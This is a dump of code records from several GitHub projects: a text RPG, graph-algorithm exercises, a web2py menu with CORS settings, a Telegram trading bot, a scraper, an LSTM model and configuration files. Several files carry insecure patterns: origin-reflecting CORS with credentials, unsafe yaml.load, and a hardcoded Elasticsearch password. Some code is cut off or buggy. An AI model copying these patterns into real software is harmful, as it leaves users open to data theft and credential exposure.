int(equip)\n equip_name = eq_me[eq_int]\n if equip_name in eq_me:\n p_eqShield.pop()\n p_eqShield.append(equip_name)\n p_eqSDefenseNum.pop()\n p_eqSDefense = items[\"Shields\"][p_eqShield[0]][\"Defense\"]\n p_eqSDefenseNum.append(p_eqSDefense)\n print(f\"You equipped {eq_me[eq_int]}\")\n print(\"\")\n eq_me.clear()\n else:\n print(\"No such shield with that name!\")\n print(\"\")\n except IndexError:\n print(\"No such shield with that name!\")\n print(\"\")\n\n\n# DELETE LVLUP FUNC LATER\ndef lvlup():\n global p_strength, p_level, p_health_max, p_defense, p_stamina_max, p_vitality, p_health_current, p_stamina\n p_level += 1\n p_strength += 2\n p_health_max += 5\n p_defense += 1\n p_stamina_max += 1\n p_stamina = p_stamina_max\n p_vitality += 3\n p_health_current = p_health_max\n return p_strength, p_level, p_health_max, p_defense, p_stamina, p_vitality, p_health_current, p_stamina\n\n\n# Show Equipped items\ndef show():\n print(f\"{p_eqWeapon[0]} - Damage {p_eqWPowerNum}\")\n print(f\"{p_eqArmor[0]} - Defense {p_eqADefenseNum}\")\n print(f\"{p_eqShield[0]} - Defense {p_eqSDefenseNum}\")\n\n\n# Sell from inventory\ndef sell():\n global inventory\n global p_gold\n global p_health_current\n global p_eqWeapon\n i = 0\n sell_me = []\n price = []\n temp_inv = []\n try:\n try:\n for item in items[\"Weapons\"]:\n\n if item in inventory:\n\n sell_me.append(item)\n sell_price = items[\"Weapons\"][item][\"Price\"]\n sell_name = items[\"Weapons\"][item][\"Name\"]\n price.append(sell_price)\n temp_inv.append(item)\n print(f\"{i}. {item} - {sell_price}\")\n i += 1\n\n for item in items[\"Armors\"]:\n\n if item in inventory:\n\n sell_me.append(item)\n sell_price = items[\"Armors\"][item][\"Price\"]\n price.append(sell_price)\n temp_inv.append(item)\n print(f\"{i}. {item} - {sell_price}\")\n i += 1\n\n for item in items[\"Shields\"]:\n\n if item in inventory:\n\n sell_me.append(item)\n sell_price = items[\"Shields\"][item][\"Price\"]\n price.append(sell_price)\n temp_inv.append(item)\n print(f\"{i}. {item} - {sell_price}\")\n i += 1\n\n sell = int(input(\"Which item you want to sell? >> \"))\n p_gold += price[sell]\n print(f\"Sold {sell_me[sell]} for {price[sell]}\")\n temp_inv.pop(sell)\n inventory.clear()\n\n for x in temp_inv:\n inventory.append(x)\n\n return inventory, p_gold\n except ValueError:\n print(\"I don't speak gibberish!\")\n except IndexError:\n print(\"Trying to scam me ya fool?!\")\n print(\"*HEAVY PUNCH*\")\n heavy_punch = random.randint(5, 20)\n p_health_current -= heavy_punch\n print(f\"You've taken {heavy_punch} points of damage!\")\n\n\n# Showcase of commands\ndef info():\n i = 0\n for cmd in comms:\n print(f\"{i}. {cmd}\")\n i += 1\n\n\n# Simple About\ndef about():\n print('''\n pyRPG v0.2\n Programmed by Yannick\n ''')\n\n\ndef target():\n try:\n print(f\"Your target is {p_target[0]} ({rarity_perc[0]}%)\")\n print()\n except IndexError:\n print(\"You have no target\")\n\n\ndef battle():\n global p_health_current\n global p_exp, p_stamina\n generate = 1\n\n if generate == 1:\n generate_enemy()\n generate -= 1\n enemy_hp = monsters[en_rarity[0]][p_target[0]][\"HP\"]\n enemy_str = monsters[en_rarity[0]][p_target[0]][\"STR\"]\n #print(f\"{p_health_current} / {p_health_max} HP, {p_stamina} / {p_stamina_max} STA\")\n #print(f\"Enemy HP {enemy_hp}, STR {enemy_str}\")\n #print(f\"Awards {true_exp} EXPs\")\n # BATTLE ITSELF\n while en_hp[0] >= 1 or p_health_current >= 1:\n\n if p_health_current > p_health_max:\n p_health_current = p_health_max\n if p_stamina > p_stamina_max:\n p_stamina = p_stamina_max\n if p_health_current > p_health_max and p_stamina > p_stamina_max:\n p_health_current = p_health_max\n p_stamina = p_stamina_max\n\n print(\"======\")\n print(f\"Enemy: {en_name[0]}\")\n print(f\"HP: {en_hp[0]} | STR: {en_str[0]}\")\n print(\"======\")\n print(f\"HP: {p_health_current} / {p_health_max} | STA: {p_stamina} / {p_stamina_max}\")\n print(f\"{btl_comms}\")\n\n btl_console = input(f\"What will you do to {en_name[0]}? >> \")\n if btl_console == \"rtd\":\n rtd()\n if en_hp[0] <= 0:\n print(f\"Enemy {en_name[0]} has perished!\")\n print(f\"You have gained {en_exp[0]} points of Experience!\")\n print(\"\")\n p_exp += en_exp[0]\n p_stamina = p_stamina_max\n randomloot()\n return p_exp, p_stamina\n else:\n en_rtd()\n elif btl_console == \"uskill\":\n use_skill()\n if en_hp[0] <= 0:\n print(f\"Enemy {en_name[0]} has perished!\")\n print(f\"You have gained {en_exp[0]} points of Experience!\")\n p_exp += en_exp[0]\n p_stamina = p_stamina_max\n randomloot()\n return p_exp, p_stamina\n else:\n en_rtd()\n elif btl_console == \"escape\":\n p_health_current = p_health_current / 100\n p_stamina = p_stamina_max\n return print(f\"You escaped like a fool! {p_health_current}\"), p_stamina\n elif btl_console == \"uitem\":\n use_item()\n\n if en_hp[0] <= 0:\n print(f\"Enemy {en_name[0]} has perished!\")\n print(f\"You have gained {en_exp[0]} points of Experience!\")\n p_exp += en_exp[0]\n p_stamina = p_stamina_max\n randomloot()\n elif p_health_current <= 0:\n print(f\"You have died, because your HP has reached {p_health_current}!\")\n p_stamina = p_stamina_max\n p_health_current = (p_health_max / 100) * 25\n return p_health_current, p_stamina\n\n target()\n return\n\n\ndef generate_enemy():\n global p_target\n global en_name ,en_hp, en_str, en_exp, en_rarity, rarity_perc\n global true_exp\n rarity = random.randint(0, 100)\n en_name.clear()\n en_hp.clear()\n en_str.clear()\n en_exp.clear()\n en_rarity.clear()\n rarity_perc.clear()\n p_target.clear()\n print(f\"Rarity level {100 - rarity}%\")\n rarity_perc.append(rarity)\n if rarity <= 40:\n enem = random.choice(commons_list)\n en_name.append(monsters[\"Common\"][enem][\"Name\"])\n en_hp.append(monsters[\"Common\"][enem][\"HP\"])\n en_str.append(monsters[\"Common\"][enem][\"STR\"])\n en_exp.append(monsters[\"Common\"][enem][\"EXP\"])\n true_exp = en_exp[0] * (rarity / 100)\n print(f\"Your enemy is Common {enem}\")\n print(f\"Stats: {en_hp[0]} HP, {en_str[0]} STR\")\n p_target.append(enem)\n en_rarity.append(\"Common\")\n return p_target, en_rarity, true_exp, rarity_perc\n\n elif rarity <= 60:\n enem = random.choice(uncommons_list)\n en_name.append(monsters[\"Uncommon\"][enem][\"Name\"])\n en_hp.append(monsters[\"Uncommon\"][enem][\"HP\"])\n en_str.append(monsters[\"Uncommon\"][enem][\"STR\"])\n en_exp.append(monsters[\"Uncommon\"][enem][\"EXP\"])\n true_exp = en_exp[0] * (rarity / 100)\n print(f\"Your enemy is Uncommon {enem}\")\n print(f\"Stats: {en_hp[0]} HP, {en_str[0]} STR\")\n p_target.append(enem)\n en_rarity.append(\"Uncommon\")\n return p_target, en_rarity, true_exp\n\n elif rarity <= 75:\n enem = random.choice(rares_list)\n en_name.append(monsters[\"Rare\"][enem][\"Name\"])\n en_hp.append(monsters[\"Rare\"][enem][\"HP\"])\n en_str.append(monsters[\"Rare\"][enem][\"STR\"])\n en_exp.append(monsters[\"Rare\"][enem][\"EXP\"])\n true_exp = en_exp[0] * (rarity / 100)\n print(f\"Your enemy is Rare {enem}\")\n print(f\"Stats: {en_hp[0]} HP, {en_str[0]} STR\")\n p_target.append(enem)\n en_rarity.append(\"Rare\")\n return p_target, en_rarity, true_exp\n\n elif rarity <= 99:\n enem = random.choice(elites_list)\n en_name.append(monsters[\"Elite\"][enem][\"Name\"])\n en_hp.append(monsters[\"Elite\"][enem][\"HP\"])\n en_str.append(monsters[\"Elite\"][enem][\"STR\"])\n en_exp.append(monsters[\"Elite\"][enem][\"EXP\"])\n true_exp = en_exp[0] * (rarity / 100)\n print(f\"Your enemy is Elite {enem}\")\n print(f\"Stats: {en_hp} HP, {en_str} STR\")\n p_target.append(enem)\n en_rarity.append(\"Elite\")\n return p_target, en_rarity, true_exp\n\n elif rarity == 100:\n enem = random.choice(legendaries_list)\n en_name.append(monsters[\"Legendary\"][enem][\"Name\"])\n en_hp.append(monsters[\"Legendary\"][enem][\"HP\"])\n en_str.append(monsters[\"Legendary\"][enem][\"STR\"])\n en_exp.append(monsters[\"Legendary\"][enem][\"EXP\"])\n true_exp = en_exp[0] * (rarity / 100)\n print(f\"Your enemy is Legendary {enem}\")\n print(f\"Stats: {en_hp[0]} HP, {en_str[0]} STR\")\n print(\"======\")\n p_target.append(enem)\n en_rarity.append(\"Legendary\")\n return p_target, en_rarity, true_exp\n\n else:\n print(\"UNEXPECTED ERROR/S\")\n\n# Add random loot to inventory\ndef randomloot():\n global inventory\n\n for x in range(0, 6, 2):\n loot = random.choice(item_loot_list)\n\n if loot in inventory:\n print(f\"{loot} already in inventory, you leave {loot} forgotten behind!\")\n elif loot in consumables:\n\n consumables.append(loot)\n print(f\"{loot} added to your Pouch!\")\n else:\n inventory.append(loot)\n print(f\"Item {loot} was added to your Inventory!\")\n\n","repo_name":"r1xvu0/pyRPG","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":21922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41957903549","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport dsf\r\nimport graph_AL\r\nimport min_heap\r\nimport math\r\n\r\ndef random_graph(nv,ne,weighted=False, directed = False,seed=-1):\r\n if seed>=0:\r\n np.random.seed(seed)\r\n G=graph_AL.Graph(nv,weighted=weighted, directed = directed)\r\n edges = set()\r\n ne = min(ne,nv*(nv-1)//2)\r\n while len(edges) < ne:\r\n source = np.random.randint(nv)\r\n dest = (np.random.randint(1,nv)+source)%nv\r\n if (source,dest) not in edges and (dest,source) not in edges:\r\n edges.add((source,dest))\r\n if weighted:\r\n w = np.random.permutation(ne) + 1\r\n else:\r\n w = np.ones(ne,dtype=np.int32)\r\n for i, edge in enumerate(edges):\r\n G.insert_edge(edge[0],edge[1],w[i])\r\n return G\r\n\r\ndef dijkstra(G,source=0):\r\n visited = set()\r\n dist = [math.inf for v in G.AL]\r\n prev = [-1 for v in G.AL]\r\n dist[source] = 0\r\n H = min_heap.min_heap()\r\n H.insert(min_heap.heap_record(0,source))\r\n while len(H.heap)>0 and len(visited)0:\r\n for edge in G.AL[Q.pop(0)]:\r\n if edge.dest not in visited_list:\r\n visited_list.append(edge.dest)\r\n Q.append(edge.dest)\r\n return visited_list\r\n\r\ndef depth_first_search_order(G,source=0,visited=None,prev=None,visited_list=None):\r\n # T(V,E) = O(|V|*|E|)\r\n if visited==None:\r\n visited = set()\r\n prev = [-1 for i in range(len(G.AL))]\r\n visited_list=[source]\r\n visited.add(source)\r\n for edge in G.AL[source]:\r\n if edge.dest not in visited:\r\n prev[edge.dest] = source\r\n visited_list.append(edge.dest)\r\n depth_first_search_order(G,edge.dest,visited,prev,visited_list)\r\n return visited_list\r\n\r\ndef make_ts(G):\r\n # T(V,E) = O(|V|*|E|)\r\n in_deg = np.array(in_degrees(G))\r\n ts = []\r\n Q = [i for i in range(len(in_deg)) if in_deg[i]==0]\r\n while len(Q) != 0:\r\n v = Q.pop(0)\r\n ts.append(v)\r\n for edge in G.AL[v]:\r\n u = edge.dest\r\n in_deg[u] -= 1\r\n if in_deg[u] == 0:\r\n Q.enqueue(edge)\r\n if ts == v: \r\n return ts\r\n else:\r\n return None\r\n\r\ndef find_dist(G,prev,u):\r\n # T(V,E) = O(|V|*|E|) \r\n source,dest = prev[u],u\r\n dist = 0\r\n while source != -1:\r\n for edge in G.AL[source]:\r\n if edge.dest == dest:\r\n dest = source\r\n source = prev[dest]\r\n dist = dist+edge.weight\r\n return dist\r\n\r\nif __name__ == \"__main__\":\r\n plt.close(\"all\")\r\n\r\n print('\\nQuestion 1')\r\n v_n, e_n = 8, 5\r\n np.random.seed(0)\r\n G1 = random_graph(v_n, e_n)\r\n G1.display('G1')\r\n G1.draw('G1')\r\n for u in range(v_n):\r\n for v in range(u+1, v_n):\r\n print('connected(G1,{},{}) = {}'.format(u,v,connected(G1,u,v)))\r\n\r\n print('\\nQuestion 2')\r\n for i in range(1):\r\n v_n, e_n = 7,12\r\n np.random.seed(i)\r\n G2 = random_graph(v_n, e_n,directed=True)\r\n G2.draw('G2')\r\n G2.display('G2')\r\n for source in range(v_n):\r\n visited_list = breadth_first_search_order(G2,source)\r\n print('source =',source, 'breadth-first search order', visited_list)\r\n\r\n print('\\nQuestion 3')\r\n for i in range(1):\r\n v_n, e_n = 7,12\r\n np.random.seed(i)\r\n G3 = random_graph(v_n, e_n,directed=True)\r\n G3.draw('G3')\r\n G3.display('G3')\r\n for source in range(v_n):\r\n visited_list = depth_first_search_order(G3,source)\r\n print('source =',source, 'depth-first search order', visited_list)\r\n\r\n print('\\nQuestion 4')\r\n for i in range(1):\r\n v_n, e_n = 7,11\r\n np.random.seed(i)\r\n G4 = random_graph(v_n, e_n,directed=True)\r\n G4.draw('G4')\r\n G4.display('G4')\r\n s = make_ts(G4)\r\n print('Topological sort:',s)\r\n G4.draw('G4 after removing edges (if necessary)')\r\n G4.display('G4 after removing edges (if necessary)')\r\n\r\n print('\\nQuestion 5')\r\n for i in range(1):\r\n np.random.seed(i)\r\n G5 = random_graph(7,12,directed=True,weighted=True)\r\n G5.display('G5')\r\n G5.draw('G5')\r\n prev,dist = dijkstra(G5)\r\n print('Results:')\r\n print('prev = ',prev)\r\n print('dist = ',dist)\r\n print('Distances')\r\n for v in range(len(G5.AL)):\r\n print(v,find_dist(G5,prev,v))\r\n\r\n'''\r\nQuestion 1\r\nG1 representation\r\ndirected: False, weighted: False\r\nAdjacency list:\r\nAL[0]=[(4,1)]\r\nAL[1]=[(7,1), (3,1)]\r\nAL[2]=[(4,1)]\r\nAL[3]=[(1,1), (7,1)]\r\nAL[4]=[(0,1), (2,1)]\r\nAL[5]=[]\r\nAL[6]=[]\r\nAL[7]=[(1,1), (3,1)]\r\nconnected(G1,0,1) = False\r\nconnected(G1,0,2) = True\r\nconnected(G1,0,3) = False\r\nconnected(G1,0,4) = True\r\nconnected(G1,0,5) = False\r\nconnected(G1,0,6) = False\r\nconnected(G1,0,7) = False\r\nconnected(G1,1,2) = False\r\nconnected(G1,1,3) = True\r\nconnected(G1,1,4) = False\r\nconnected(G1,1,5) = False\r\nconnected(G1,1,6) = False\r\nconnected(G1,1,7) = True\r\nconnected(G1,2,3) = False\r\nconnected(G1,2,4) = True\r\nconnected(G1,2,5) = False\r\nconnected(G1,2,6) = False\r\nconnected(G1,2,7) = False\r\nconnected(G1,3,4) = False\r\nconnected(G1,3,5) = False\r\nconnected(G1,3,6) = False\r\nconnected(G1,3,7) = True\r\nconnected(G1,4,5) = False\r\nconnected(G1,4,6) = False\r\nconnected(G1,4,7) = False\r\nconnected(G1,5,6) = False\r\nconnected(G1,5,7) = False\r\nconnected(G1,6,7) = False\r\n\r\nQuestion 2\r\nG2 representation\r\ndirected: True, weighted: False\r\nAdjacency list:\r\nAL[0]=[(2,1), (5,1), (4,1)]\r\nAL[1]=[(5,1), (0,1)]\r\nAL[2]=[(4,1)]\r\nAL[3]=[(0,1)]\r\nAL[4]=[(5,1), (3,1), (1,1)]\r\nAL[5]=[(6,1)]\r\nAL[6]=[(0,1)]\r\nsource = 0 breadth-first search order [0, 2, 5, 4, 6, 3, 1]\r\nsource = 1 breadth-first search order [1, 5, 0, 6, 2, 4, 3]\r\nsource = 2 breadth-first search order [2, 4, 5, 3, 1, 6, 0]\r\nsource = 3 breadth-first search order [3, 0, 2, 5, 4, 6, 1]\r\nsource = 4 breadth-first search order [4, 5, 3, 1, 6, 0, 2]\r\nsource = 5 breadth-first search order [5, 6, 0, 2, 4, 3, 1]\r\nsource = 6 breadth-first search order [6, 0, 2, 5, 4, 3, 1]\r\n\r\nQuestion 3\r\nG3 representation\r\ndirected: True, weighted: False\r\nAdjacency list:\r\nAL[0]=[(2,1), (5,1), (4,1)]\r\nAL[1]=[(5,1), (0,1)]\r\nAL[2]=[(4,1)]\r\nAL[3]=[(0,1)]\r\nAL[4]=[(5,1), (3,1), (1,1)]\r\nAL[5]=[(6,1)]\r\nAL[6]=[(0,1)]\r\nsource = 0 depth-first search order [0, 2, 4, 5, 6, 3, 1]\r\nsource = 1 depth-first search order [1, 5, 6, 0, 2, 4, 3]\r\nsource = 2 depth-first search order [2, 4, 5, 6, 0, 3, 1]\r\nsource = 3 depth-first search order [3, 0, 2, 4, 5, 6, 1]\r\nsource = 4 depth-first search order [4, 5, 6, 0, 2, 3, 1]\r\nsource = 5 depth-first search order [5, 6, 0, 2, 4, 3, 1]\r\nsource = 6 depth-first search order [6, 0, 2, 4, 5, 3, 1]\r\n\r\nQuestion 4\r\nG4 representation\r\ndirected: True, weighted: False\r\nAdjacency list:\r\nAL[0]=[(2,1), (5,1), (4,1)]\r\nAL[1]=[(5,1), (0,1)]\r\nAL[2]=[(4,1)]\r\nAL[3]=[(0,1)]\r\nAL[4]=[(5,1), (3,1), (1,1)]\r\nAL[5]=[]\r\nAL[6]=[(0,1)]\r\ndeleting edge (4,1)\r\ndeleting edge (3,0)\r\nTopological sort: [6, 1, 0, 2, 4, 5, 3]\r\nG4 after removing edges (if necessary) representation\r\ndirected: True, weighted: False\r\nAdjacency list:\r\nAL[0]=[(2,1), (5,1), (4,1)]\r\nAL[1]=[(5,1), (0,1)]\r\nAL[2]=[(4,1)]\r\nAL[3]=[]\r\nAL[4]=[(5,1), (3,1)]\r\nAL[5]=[]\r\nAL[6]=[(0,1)]\r\n\r\nQuestion 5\r\nG5 representation\r\ndirected: True, weighted: True\r\nAdjacency list:\r\nAL[0]=[(2,1), (5,6), (4,2)]\r\nAL[1]=[(5,8), (0,9)]\r\nAL[2]=[(4,3)]\r\nAL[3]=[(0,5)]\r\nAL[4]=[(5,10), (3,11), (1,4)]\r\nAL[5]=[(6,12)]\r\nAL[6]=[(0,7)]\r\nResults:\r\nprev = [-1, 4, 0, 4, 0, 0, 5]\r\ndist = [0, 6, 1, 13, 2, 6, 18]\r\nDistances\r\n0 0\r\n1 6\r\n2 1\r\n3 13\r\n4 2\r\n5 6\r\n6 18\r\n'''\r\n","repo_name":"jamesb5959/CS2402","sub_path":"graph_algorithms_exercise2_start.py","file_name":"graph_algorithms_exercise2_start.py","file_ext":"py","file_size_in_byte":8645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25090691698","text":"# -*- coding: utf-8 -*-\n# this file is released under public domain and you can use without limitations\n\n# ----------------------------------------------------------------------------------------------------------------------\n# this is the main application menu add/remove items as required\n# ----------------------------------------------------------------------------------------------------------------------\n\nresponse.menu = [\n (T('Pages'), False, URL('app', 'pages'), [])\n]\n\n# ----------------------------------------------------------------------------------------------------------------------\n# provide shortcuts for development. you can remove everything below in production\n# ----------------------------------------------------------------------------------------------------------------------\n\nif not configuration.get('app.production'):\n _app = request.application\n response.menu += [\n (T('This App'), False, '#', [\n (T('Design'), False, URL('admin', 'default', 'design/%s' % _app)),\n (T('Controller'), False,\n URL(\n 'admin', 'default', 'edit/%s/controllers/%s.py' % (_app, request.controller))),\n (T('View'), False,\n URL(\n 'admin', 'default', 'edit/%s/views/%s' % (_app, response.view))),\n (T('DB Model'), False,\n URL(\n 'admin', 'default', 'edit/%s/models/db.py' % _app)),\n (T('Menu Model'), False,\n URL(\n 'admin', 'default', 'edit/%s/models/menu.py' % _app)),\n (T('Config.ini'), False,\n URL(\n 'admin', 'default', 'edit/%s/private/appconfig.ini' % _app)),\n (T('Layout'), False,\n URL(\n 'admin', 'default', 'edit/%s/views/layout.html' % _app)),\n (T('Stylesheet'), False,\n URL(\n 'admin', 'default', 'edit/%s/static/css/web2py-bootstrap3.css' % _app)),\n (T('Database'), False, URL(_app, 'appadmin', 'index')),\n (T('Errors'), False, URL(\n 'admin', 'default', 'errors/' + _app)),\n (T('About'), False, URL(\n 'admin', 'default', 'about/' + _app)),\n ]),\n ('web2py.com', False, '#', [\n (T('Download'), False,\n 'http://www.web2py.com/examples/default/download'),\n (T('Support'), False,\n 'http://www.web2py.com/examples/default/support'),\n (T('Demo'), False, 'http://web2py.com/demo_admin'),\n (T('Quick Examples'), False,\n 'http://web2py.com/examples/default/examples'),\n (T('FAQ'), False, 'http://web2py.com/AlterEgo'),\n (T('Videos'), False,\n 'http://www.web2py.com/examples/default/videos/'),\n (T('Free Applications'),\n False, 'http://web2py.com/appliances'),\n (T('Plugins'), False, 'http://web2py.com/plugins'),\n (T('Recipes'), False, 'http://web2pyslices.com/'),\n ]),\n (T('Documentation'), False, '#', [\n (T('Online book'), False, 'http://www.web2py.com/book'),\n (T('Preface'), False,\n 'http://www.web2py.com/book/default/chapter/00'),\n (T('Introduction'), False,\n 'http://www.web2py.com/book/default/chapter/01'),\n (T('Python'), False,\n 'http://www.web2py.com/book/default/chapter/02'),\n (T('Overview'), False,\n 'http://www.web2py.com/book/default/chapter/03'),\n (T('The Core'), False,\n 'http://www.web2py.com/book/default/chapter/04'),\n (T('The Views'), False,\n 'http://www.web2py.com/book/default/chapter/05'),\n (T('Database'), False,\n 'http://www.web2py.com/book/default/chapter/06'),\n (T('Forms and Validators'), False,\n 'http://www.web2py.com/book/default/chapter/07'),\n (T('Email and SMS'), False,\n 'http://www.web2py.com/book/default/chapter/08'),\n (T('Access Control'), False,\n 'http://www.web2py.com/book/default/chapter/09'),\n (T('Services'), False,\n 'http://www.web2py.com/book/default/chapter/10'),\n (T('Ajax Recipes'), False,\n 'http://www.web2py.com/book/default/chapter/11'),\n (T('Components and Plugins'), False,\n 'http://www.web2py.com/book/default/chapter/12'),\n (T('Deployment Recipes'), False,\n 'http://www.web2py.com/book/default/chapter/13'),\n (T('Other Recipes'), False,\n 'http://www.web2py.com/book/default/chapter/14'),\n (T('Helping web2py'), False,\n 'http://www.web2py.com/book/default/chapter/15'),\n (T(\"Buy web2py's book\"), False,\n 'http://stores.lulu.com/web2py'),\n ]),\n (T('Community'), False, None, [\n (T('Groups'), False,\n 'http://www.web2py.com/examples/default/usergroups'),\n (T('Twitter'), False, 'http://twitter.com/web2py'),\n (T('Live Chat'), False,\n 'http://webchat.freenode.net/?channels=web2py'),\n ]),\n ]\n\n\nUSER_TOKEN_HEADER_KEY = \"x-gg-userid\"\n\nALLOWED_HEADERS = \"Origin, X-Requested-With, Content-Type, Accept, Key, Accept-Ranges, Range, Authorization, %s\" % USER_TOKEN_HEADER_KEY\nALLOWED_METHODS = \"POST, GET, OPTIONS, PUT, PATCH, DELETE, HEAD\"\nEXPOSED_HEADERS = \"Accept-Ranges, Content-Encoding, Content-Length, Content-Range, %s\" % USER_TOKEN_HEADER_KEY\n\n\nresponse.headers['Access-Control-Allow-Credentials'] = 'true'\nresponse.headers[\"Access-Control-Allow-Headers\"] = ALLOWED_HEADERS\nresponse.headers[\"Access-Control-Allow-Methods\"] = ALLOWED_METHODS\nresponse.headers[\"Access-Control-Allow-Origin\"] = request.env.http_origin\nresponse.headers['Access-Control-Max-Age'] = 86400\nresponse.headers[\"Access-Control-Expose-Headers\"] = EXPOSED_HEADERS\nresponse[\"Access-Control-Allow-Credentials\"] = \"true\"\nresponse[\"Access-Control-Allow-Headers\"] = ALLOWED_HEADERS\nresponse[\"Access-Control-Allow-Methods\"] = ALLOWED_METHODS\nresponse[\"Access-Control-Allow-Origin\"] = request.env.http_origin\nresponse['Access-Control-Max-Age'] = 86400\n\nif request.env.request_method == 'OPTIONS':\n raise HTTP(200, **response.headers) # not sure about this line\n\nset_db_defaults_and_requires(db)","repo_name":"myiremark/web2py-restful-openapi-crossplatform-app","sub_path":"src/server/web2py/applications/api/models/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6355,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"68"} +{"seq_id":"1485527434","text":"# -*- coding: utf-8 -*-\n\n# Récupération des données de FICHIER stockées sous format YAML pour traitement par Python\n\nimport yaml\n\ndef lecture(fichier):\n # On charge le fichier et stocke son contenu dans un dictionnaire\n stream = open(fichier, \"r\")\n docs = yaml.load(stream)\n\n # On remplit les variables restées vides des dictionnaires dans le dictionnaire créé\n for key in docs.keys():\n if 'Contenu' not in docs[key].keys():\n docs[key]['Contenu']=''\n if 'Sujet' not in docs[key].keys():\n docs[key]['Sujet']=''\n if 'Parent' not in docs[key].keys():\n docs[key]['Parent']=[]\n if 'SousGroupe' not in docs[key].keys():\n docs[key]['SousGroupe']=[]\n return docs\n\n# On imprime le contenu du dictionnaire\nif __name__ == \"__main__\":\n docs=lecture(\"Sauvegarde4\")\n for key in docs.keys():\n print(key, ' -> ', docs[key])","repo_name":"Bencake/Groupes","sub_path":"lecture.py","file_name":"lecture.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8501639107","text":"\nimport os\nimport logging\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nfrom metaapi_cloud_sdk import MetaApi\nfrom metaapi_cloud_sdk.clients.meta_api_client import MetaApiClient\nfrom metaapi_cloud_sdk.clients.meta_api_client import MarketTrade\n\n# Set up logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n# Define the forward function\ndef forward(update, context):\n # Get the message from the source channel\n message = update.message\n # Forward the message to the destination channel using your bot\n context.bot.forward_message(chat_id='@destination_channel', from_chat_id='@source_channel', message_id=message.message_id)\n # Place a trade on MetaAPI using the message received from the source channel\n api_token = os.environ['META_API_TOKEN']\n account_id = os.environ['META_API_ACCOUNT_ID']\n symbol = 'EURUSD'\n trade_type = 'MARKET'\n volume = 0.01\n stop_loss = 1.2\n take_profit = 1.4\n client = MetaApiClient(api_token)\n account_information = client.get_account(account_id)\n if account_information.state != 'DEPLOYED':\n raise Exception('The account is not deployed')\n if not account_information.connection_status.connected:\n raise Exception('The account is not connected to broker')\n if not account_information.connection_status.trading_permitted:\n raise Exception('The account is not permitted for trading')\n trade = MarketTrade()\n trade.symbol = symbol\n trade.type = trade_type\n trade.volume = volume\n trade.stop_loss = stop_loss\n trade.take_profit = take_profit\n client.create_trade(account_id, trade)\n\n# Define the main function\ndef main():\n # Create an instance of the Updater class and pass in your bot's API token\n updater = Updater(token=os.environ['TELEGRAM_BOT_TOKEN'], use_context=True)\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # Add a handler for forwarding messages and placing trades on MetaAPI\n dispatcher.add_handler(MessageHandler(Filters.chat('@source_channel'), forward))\n\n # Start the bot\n updater.start_polling()\n\nif __name__ == '__main__':\n main()\n","repo_name":"onyechiforever/Tronice","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2604825619","text":"from urllib import request\nimport re\n\nurl = \"http://tieba.baidu.com/f?kw=%E6%89%8B%E6%9C%BA\"\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0\"\n}\n\nreq = request.Request(url=url, headers=headers)\n\nresponse = request.urlopen(req)\n\nhtml = response.read().decode('utf-8')\n\nimgList = re.findall(r' 3:\n x = torch.reshape(x, (-1, seq_len, self.input_size))\n # type change\n x = x.float()\n\n h_0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(self.device)\n c_0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(self.device)\n\n # Propagate input through LSTM\n _, (h_out, _) = self.lstm(x, (h_0, c_0))\n h_out = h_out.view(-1, self.hidden_size) \n out = self.fc(h_out)\n\n # reshape out and change type to match label\n out = torch.reshape(out, (setsz, seq_n))\n out = out.double()\n\n return out\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"YuhaoWong0103/fsl_ts","sub_path":"lstm_learner.py","file_name":"lstm_learner.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"34735778100","text":"import time\nimport sys\n\n# globals\ndefault_use_model = 'https://tfhub.dev/google/universal-sentence-encoder-large/3?tf-hub-format=compressed'\ndefault_csv_file_path = './data/articles_small.csv'\n\ndefault_batch_size = 10\ndefault_stop_words = False\ndefault_vector_size = 512\ndefault_elasticindex_name = 'articles_small'\ndefault_elastic_server = 'http://elastic:Elastic123@localhost:9200/'\ndefault_bootstrap_servers = ['localhost:9092']\n\ng_columns = ['id', 'title', 'publication', 'content']\ng_id_index = 0\ng_content_index = 3\ng_content_key = 'content'\n\ng_mapping = {\n 'mappings': {\n 'properties': {\n 'id': {\n 'type': 'text'\n },\n 'title': {\n 'type': 'text'\n },\n 'publication': {\n 'type': 'text'\n },\n 'content': {\n 'type': 'text'\n },\n 'embedding': {\n 'type': 'dense_vector',\n 'dims': default_vector_size\n }\n }\n }\n}\n\ndef print_with_time(msg):\n print('{}: {}'.format(time.ctime(), msg))\n sys.stdout.flush()\n","repo_name":"Efficacy-Consulting/sentence-similarity-with-elasticindexing","sub_path":"app/src/similarity_utils.py","file_name":"similarity_utils.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26689829446","text":"from .models import *\nfrom django.forms.models import inlineformset_factory\nfrom django.forms import ModelForm, Textarea\nfrom django import forms\n\nclass RecipeForm(ModelForm):\n class Meta:\n model = Recipe\n fields = ['title','foodname', 'titleimage', 'servings','cookingtime']\n\nclass 